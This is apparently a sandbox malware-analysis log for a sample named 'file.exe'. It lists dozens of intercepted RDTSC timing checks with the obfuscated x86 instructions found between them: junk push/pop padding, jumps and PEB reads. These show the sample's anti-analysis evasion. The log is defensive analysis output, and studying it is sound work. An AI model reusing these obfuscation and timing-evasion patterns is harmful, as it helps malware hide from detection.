                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F42D0 second address: 6F430D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FCBA46BC73Ch 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnl 00007FCBA46BC736h 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 mov dx, cx 0x0000001b pushad 0x0000001c mov cx, bx 0x0000001f mov eax, ecx 0x00000021 popad 0x00000022 push 00000004h 0x00000024 mov dx, 8262h 0x00000028 push F9A4D2BAh 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jbe 00007FCBA46BC736h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5BB5 second address: 6F5BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5BBB second address: 6F5BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BF2 second address: 49F1BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BF6 second address: 49F1BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1BFC second address: 49F1ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b xor esi, eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 push eax 0x00000011 call 00007FCBA8E0019Dh 0x00000016 mov edi, edi 0x00000018 pushad 0x00000019 mov cl, 20h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FCBA4817E89h 0x00000023 or si, 25B6h 0x00000028 jmp 00007FCBA4817E81h 0x0000002d popfd 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1ADD second address: 49F1B09 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FCBA46BC740h 0x00000008 add cl, FFFFFFD8h 0x0000000b jmp 00007FCBA46BC73Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1B09 second address: 49F1B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1B0F second address: 49F1B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1B20 second address: 49F1B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1B24 second address: 49F1B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1B2A second address: 49F1B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCBA4817E7Bh 0x00000015 adc ch, FFFFFFAEh 0x00000018 jmp 00007FCBA4817E89h 0x0000001d popfd 0x0000001e mov si, EA37h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1B67 second address: 49F1B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1933 second address: 49F1958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1958 second address: 49F195C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F195C second address: 49F1975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1975 second address: 49F197B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990A0B second address: 4990A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FCBA4817E86h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FCBA4817E80h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FCBA4817E7Dh 0x00000020 sub eax, 16795346h 0x00000026 jmp 00007FCBA4817E81h 0x0000002b popfd 0x0000002c mov bx, cx 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C078D second address: 49C07FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FCBA46BC73Eh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FCBA46BC740h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FCBA46BC740h 0x0000001c push dword ptr [ebp+04h] 0x0000001f jmp 00007FCBA46BC740h 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 mov bx, si 0x0000002b movzx esi, di 0x0000002e popad 0x0000002f push dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FCBA46BC740h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0CF8 second address: 49A0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, 7122h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49805C5 second address: 49805CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49805CB second address: 49806D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FCBA4817E80h 0x0000000f push eax 0x00000010 jmp 00007FCBA4817E7Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FCBA4817E86h 0x0000001b mov ebp, esp 0x0000001d jmp 00007FCBA4817E80h 0x00000022 mov ecx, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 movzx eax, bx 0x00000029 pushfd 0x0000002a jmp 00007FCBA4817E83h 0x0000002f add ah, FFFFFF9Eh 0x00000032 jmp 00007FCBA4817E89h 0x00000037 popfd 0x00000038 popad 0x00000039 sub eax, eax 0x0000003b jmp 00007FCBA4817E87h 0x00000040 inc eax 0x00000041 pushad 0x00000042 movzx eax, di 0x00000045 mov dx, 7874h 0x00000049 popad 0x0000004a lock xadd dword ptr [ecx], eax 0x0000004e pushad 0x0000004f mov dx, 620Ch 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 pushfd 0x00000057 jmp 00007FCBA4817E81h 0x0000005c xor cx, F0E6h 0x00000061 jmp 00007FCBA4817E81h 0x00000066 popfd 0x00000067 popad 0x00000068 popad 0x00000069 inc eax 0x0000006a jmp 00007FCBA4817E7Eh 0x0000006f pop ebp 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 mov dx, ax 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F002A second address: 49F005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA46BC741h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F005F second address: 49F0066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 77h 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0066 second address: 49F006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F006C second address: 49F0070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0070 second address: 49F014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FCBA46BC73Eh 0x00000012 mov eax, dword ptr fs:[00000030h] 0x00000018 jmp 00007FCBA46BC740h 0x0000001d sub esp, 18h 0x00000020 pushad 0x00000021 jmp 00007FCBA46BC73Eh 0x00000026 jmp 00007FCBA46BC742h 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d jmp 00007FCBA46BC740h 0x00000032 push eax 0x00000033 pushad 0x00000034 mov bh, BBh 0x00000036 mov bl, ch 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b jmp 00007FCBA46BC73Bh 0x00000040 pushfd 0x00000041 jmp 00007FCBA46BC748h 0x00000046 sbb al, 00000058h 0x00000049 jmp 00007FCBA46BC73Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov ebx, dword ptr [eax+10h] 0x00000053 jmp 00007FCBA46BC746h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FCBA46BC747h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F014F second address: 49F0179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 72A0E28Ah 0x00000008 call 00007FCBA4817E7Bh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FCBA4817E7Eh 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0179 second address: 49F017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F017F second address: 49F0183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0183 second address: 49F0187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0187 second address: 49F01A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d mov cx, dx 0x00000010 popad 0x00000011 mov esi, dword ptr [772406ECh] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01A4 second address: 49F01AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01AA second address: 49F0210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FCBA4817E7Eh 0x00000010 jne 00007FCBA4818D8Eh 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA4817E7Eh 0x0000001d add cx, BB68h 0x00000022 jmp 00007FCBA4817E7Bh 0x00000027 popfd 0x00000028 call 00007FCBA4817E88h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0210 second address: 49F024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007FCBA46BC73Ch 0x0000000c mov dword ptr [esp], edi 0x0000000f jmp 00007FCBA46BC740h 0x00000014 call dword ptr [77210B60h] 0x0000001a mov eax, 766BE5E0h 0x0000001f ret 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCBA46BC73Ah 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F024A second address: 49F0259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0259 second address: 49F0261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0261 second address: 49F0272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000044h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edx 0x0000000e mov dl, DDh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0272 second address: 49F0278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0278 second address: 49F027C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F027C second address: 49F0293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a call 00007FCBA46BC73Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0293 second address: 49F02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 call 00007FCBA4817E7Fh 0x0000000a pushfd 0x0000000b jmp 00007FCBA4817E88h 0x00000010 or al, 00000078h 0x00000013 jmp 00007FCBA4817E7Bh 0x00000018 popfd 0x00000019 pop ecx 0x0000001a popad 0x0000001b push esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02D8 second address: 49F02DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02DC second address: 49F02E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02E2 second address: 49F02E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02E8 second address: 49F02EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02EC second address: 49F0306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA46BC73Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0306 second address: 49F032C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA4817E7Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F032C second address: 49F0366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f jmp 00007FCBA46BC73Eh 0x00000014 push dword ptr [eax+18h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBA46BC73Ah 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0366 second address: 49F036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0453 second address: 49F0457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0457 second address: 49F045B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F045B second address: 49F0461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0461 second address: 49F0496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E85h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0496 second address: 49F049C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F049C second address: 49F04A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F04A0 second address: 49F04F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+50h] 0x0000000e pushad 0x0000000f movzx ecx, bx 0x00000012 movsx edi, cx 0x00000015 popad 0x00000016 mov dword ptr [esi+14h], eax 0x00000019 jmp 00007FCBA46BC748h 0x0000001e mov eax, dword ptr [ebx+54h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FCBA46BC73Ah 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F04F0 second address: 49F04F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F04F6 second address: 49F04FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F04FC second address: 49F0500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0500 second address: 49F053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b jmp 00007FCBA46BC744h 0x00000010 mov eax, dword ptr [ebx+58h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCBA46BC747h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F053B second address: 49F058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCBA4817E7Fh 0x00000008 pop eax 0x00000009 mov dx, D3ECh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esi+1Ch], eax 0x00000013 jmp 00007FCBA4817E7Bh 0x00000018 mov eax, dword ptr [ebx+5Ch] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007FCBA4817E82h 0x00000024 sub ecx, 5AA30D38h 0x0000002a jmp 00007FCBA4817E7Bh 0x0000002f popfd 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F058E second address: 49F0599 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0599 second address: 49F059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F059D second address: 49F05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esi+20h], eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov al, 3Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F05AA second address: 49F05EB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FCBA4817E7Bh 0x00000008 and eax, 0CE1D7AEh 0x0000000e jmp 00007FCBA4817E89h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 mov al, BFh 0x00000019 mov ebx, 4216C50Eh 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+60h] 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F05EB second address: 49F060C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCBA46BC73Dh 0x0000000c popad 0x0000000d mov dword ptr [esi+24h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, 7B8DE26Eh 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F060C second address: 49F063C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c jmp 00007FCBA4817E80h 0x00000011 mov dword ptr [esi+28h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F063C second address: 49F0640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0640 second address: 49F065D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F065D second address: 49F072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ax, BA89h 0x00000012 mov al, 76h 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007FCBA46BC73Bh 0x0000001b sub ax, 833Eh 0x00000020 jmp 00007FCBA46BC749h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esi+2Ch], eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FCBA46BC73Ch 0x00000031 xor cl, 00000038h 0x00000034 jmp 00007FCBA46BC73Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007FCBA46BC748h 0x00000040 adc si, 1A98h 0x00000045 jmp 00007FCBA46BC73Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov ax, word ptr [ebx+6Ch] 0x00000050 jmp 00007FCBA46BC746h 0x00000055 mov word ptr [esi+30h], ax 0x00000059 pushad 0x0000005a mov cx, 460Dh 0x0000005e mov eax, 276D3609h 0x00000063 popad 0x00000064 mov ax, word ptr [ebx+00000088h] 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e mov ax, dx 0x00000071 popad 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F072C second address: 49F0732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0732 second address: 49F0736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
